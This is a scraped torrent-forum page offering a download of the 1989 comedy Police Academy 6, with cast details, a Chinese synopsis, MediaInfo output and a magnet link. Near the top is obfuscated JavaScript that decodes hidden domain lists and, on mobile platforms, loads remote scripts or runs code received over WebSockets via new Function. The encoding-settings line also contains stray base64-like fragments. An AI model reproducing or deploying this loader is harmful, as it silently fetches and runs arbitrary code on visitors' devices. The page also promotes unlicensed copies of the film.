警察学校6:解救围城[双语字幕]Police.Academy.6.City.Under.Siege.1989.1080p.BluRay.x264.DTS.1.0-迅雷下载 8.27GB

版主小s 24天前 170

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 警察学校6:解救围城 / 臭气逼人 / 解救围城

◎片 名 Police Academy 6: City Under Siege

◎年 代 1989

◎产 地 美国

◎类 别 喜剧 / 犯罪

◎语 言 英语

◎上映日期 1989-03-10

◎IMDb评分 4.5/10 from 28451 users

◎IMDb链接 https://www.imdb.com/title/tt0098105

◎豆瓣评分 6.7/10 from 963 users

◎豆瓣链接 https://movie.douban.com/subject/1297345/

◎片 长 84分钟

◎导 演 彼得·博内兹 Peter Bonerz

◎编 剧 尼尔·伊斯雷尔 Neal Israel / 帕特·普罗夫特 Pat Proft / Stephen Curwick

◎主 演 布巴·史密斯 Bubba Smith

大卫·格拉夫 David Graf

迈克尔·温斯洛 Michael Winslow

格里特·格雷厄姆 Gerrit Graham

Darwyn Swalve

马里昂·拉姆塞 Marion Ramsey

乔治·R·罗伯逊 George R. Robertson

艾莉森·麦克 Allison Mack

Peter Elbling

罗伯塔·海恩斯 Roberta Haynes

兰斯·金赛 Lance Kinsey

Christopher Wolf

Dennis Ott

Melle Mel

G.W.拜利 G.W. Bailey

亚瑟·拜坦德斯 Arthur Batanides

比莉·伯德 Billie Bird

格雷格·科林斯 Greg Collins

马特·麦考伊 Matt McCoy

Kort Falkenberg

亚历山大·福克 Alexander Folk

莱斯利·伊斯特布鲁克 Leslie Easterbrook

乔治·盖恩斯 George Gaynes

Mark J. Goodman

保罗·马斯兰斯基 Paul Maslansky

Alan Hunter

Rusdi Lane

Tom Lawrence

Bruce Mahler

肯尼思·马尔斯 Kenneth Mars

宾斯·莫洛克 Beans Morocco

◎标 签 喜剧 | 美国 | 美国电影 | 警察学校 | 1989 | 搞笑 | 经典 | 电影

◎简 介

犯罪风潮正在席卷城市,哈里上尉和他的蹩脚助手已经对肆虐城市的威尔逊?海兹团伙无能为力。上峰不满,派来强援协助哈里,于是拉萨雷指挥官再次归来,上一集中表现出色的尼克和昔日的学员法克勒作为新鲜血液,加入了高塔(Bubba Smith 饰)、卡伦、泰克布雷、琼斯(Michael Winslow 饰)的五人小组,协助拉萨雷展开巡帧工作,但威尔逊一伙人似乎对警方的动向了若指掌,在幕后神秘人的指挥下应对有度。警方的巡侦和诱饵计划毫无收效,反被威尔逊等人四处作案抢得了主动。与此同时,被架空的哈里和市长谋划,用计将拉萨雷等人赶走。拉萨雷被栽赃陷害,与手下警员们一起被剥夺了职权,但英勇的警校毕业生们并未屈服,揭开了犯罪活动背后的房地产利益……

  1. General

  2. Unique ID : 116941835739654271396152791306545861763 (0x57FA2DA6658AC3AF77CDD6339F7F1483)

  3. Complete name : Police.Academy.6.City.Under.Siege.1989.1080p.BluRay.x264.DTS.1.0-PTH.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 8.27 GiB

  7. Duration : 1 h 23 min

  8. Overall bit rate : 14.1 Mb/s

  9. Movie name : Police Academy 6: City Under Siege

  10. Encoded date : UTC 2021-07-07 12:33:24

  11. Writing application : mkvmerge v58.0.0 ('Supper's Ready') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  13. Cover : Yes

  14. Attachments : cover.jpg


  15. Video

  16. ID : 1

  17. Format : AVC

  18. Format/Info : Advanced Video Codec

  19. Format profile : [email protected]

  20. Format settings : CABAC / 4 Ref Frames

  21. Format settings, CABAC : Yes

  22. Format settings, Reference frames : 4 frames

  23. Codec ID : V_MPEG4/ISO/AVC

  24. Duration : 1 h 23 min

  25. Bit rate : 13.3 Mb/s

  26. Width : 1 920 pixels

  27. Height : 1 080 pixels

  28. Display aspect ratio : 16:9

  29. Frame rate mode : Constant

  30. Frame rate : 23.976 (24000/1001/53354) FPS

  31. Color space : YUV

  32. Chroma subsampling : 4:2:0

  33. Bit depth : 8 bits

  34. Scan type : Progressive

  35. Bits/(Pixel*Frame) : 0.267

  36. Stream size : 7.78 GiB (94%)

  37. Writing library : x264 core 161 r3018+53 18a1d6c t_mod_New [(8 & 10)[email protected] X86_64]

  38. Encoding settings : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=9 / lookahead_threads=2 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=21.0000 / qcomp=0.65 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.70 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0

  39. Language : English

  40. Default : Yes

  41. Forced : No


  42. Audio

  43. ID : 2

  44. ID in the original source medium : 4352 (0x1100)

  45. Format : DTS

  46. Format/Info : Digital Theater Systems

  47. Codec ID : A_DTS

  48. Duration : 1 h 23 min

  49. Bit rate mode : Constant

  50. Bit rate : 768 kb/s

  51. Channel(s) : 1 channel

  52. Channel layout : C

  53. Sampling rate : 48.0 kHz

  54. Frame rate : 93.750 FPS (512 SPF)

  55. Bit depth : 24 bits

  56. Compression mode : Lossy

  57. Stream size : 461 MiB (5%)

  58. Language : English

  59. Default : Yes

  60. Forced : No

  61. Original source medium : Blu-ray


  62. Text #1

  63. ID : 3

  64. ID in the original source medium : 4621 (0x120D)

  65. Format : PGS

  66. Muxing mode : zlib

  67. Codec ID : S_HDMV/PGS

  68. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  69. Duration : 1 h 20 min

  70. Bit rate : 38.0 kb/s

  71. Count of elements : 1672

  72. Stream size : 21.9 MiB (0%)

  73. Title : chs&eng

  74. Language : Chinese

  75. Default : Yes

  76. Forced : No

  77. Original source medium : Blu-ray


  78. Text #2

  79. ID : 4

  80. ID in the original source medium : 4622 (0x120E)

  81. Format : PGS

  82. Muxing mode : zlib

  83. Codec ID : S_HDMV/PGS

  84. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  85. Duration : 1 h 20 min

  86. Bit rate : 38.2 kb/s

  87. Count of elements : 1672

  88. Stream size : 22.0 MiB (0%)

  89. Title : cht&eng

  90. Language : Chinese

  91. Default : No

  92. Forced : No

  93. Original source medium : Blu-ray


  94. Text #3

  95. ID : 5

  96. ID in the original source medium : 4623 (0x120F)

  97. Format : PGS

  98. Muxing mode : zlib

  99. Codec ID : S_HDMV/PGS

  100. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  101. Duration : 1 h 20 min

  102. Bit rate : 22.9 kb/s

  103. Count of elements : 1672

  104. Stream size : 13.2 MiB (0%)

  105. Title : chs

  106. Language : Chinese

  107. Default : No

  108. Forced : No

  109. Original source medium : Blu-ray


  110. Text #4

  111. ID : 6

  112. ID in the original source medium : 4624 (0x1210)

  113. Format : PGS

  114. Muxing mode : zlib

  115. Codec ID : S_HDMV/PGS

  116. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  117. Duration : 1 h 20 min

  118. Bit rate : 23.2 kb/s

  119. Count of elements : 1672

  120. Stream size : 13.3 MiB (0%)

  121. Title : cht

  122. Language : Chinese

  123. Default : No

  124. Forced : No

  125. Original source medium : Blu-ray


  126. Text #5

  127. ID : 7

  128. ID in the original source medium : 4609 (0x1201)

  129. Format : PGS

  130. Muxing mode : zlib

  131. Codec ID : S_HDMV/PGS

  132. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  133. Duration : 1 h 22 min

  134. Bit rate : 27.8 kb/s

  135. Count of elements : 1764

  136. Stream size : 16.5 MiB (0%)

  137. Language : English

  138. Default : No

  139. Forced : No

  140. Original source medium : Blu-ray


  141. Menu

  142. 00:00:00.000 : Chapter 01

  143. 00:04:28.184 : Chapter 02

  144. 00:06:35.603 : Chapter 03

  145. 00:11:30.523 : Chapter 04

  146. 00:14:57.771 : Chapter 05

  147. 00:18:11.799 : Chapter 06

  148. 00:20:16.256 : Chapter 07

  149. 00:22:22.966 : Chapter 08

  150. 00:24:50.655 : Chapter 09

  151. 00:29:43.948 : Chapter 10

  152. 00:32:54.013 : Chapter 11

  153. 00:36:18.718 : Chapter 12

  154. 00:39:51.972 : Chapter 13

  155. 00:43:05.874 : Chapter 14

  156. 00:46:48.472 : Chapter 15

  157. 00:50:05.502 : Chapter 16

  158. 00:54:18.463 : Chapter 17

  159. 00:56:30.887 : Chapter 18

  160. 01:04:41.210 : Chapter 19

  161. 01:08:48.958 : Chapter 20

  162. 01:15:42.496 : Chapter 21

  163. 01:20:57.227 : Chapter 22


TAGS 犯罪 喜剧

磁力链:
  • magnet:?xt=urn:btih:18996B0993EE0CFDEB1BFF9D3C2082D3B844BC3C
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖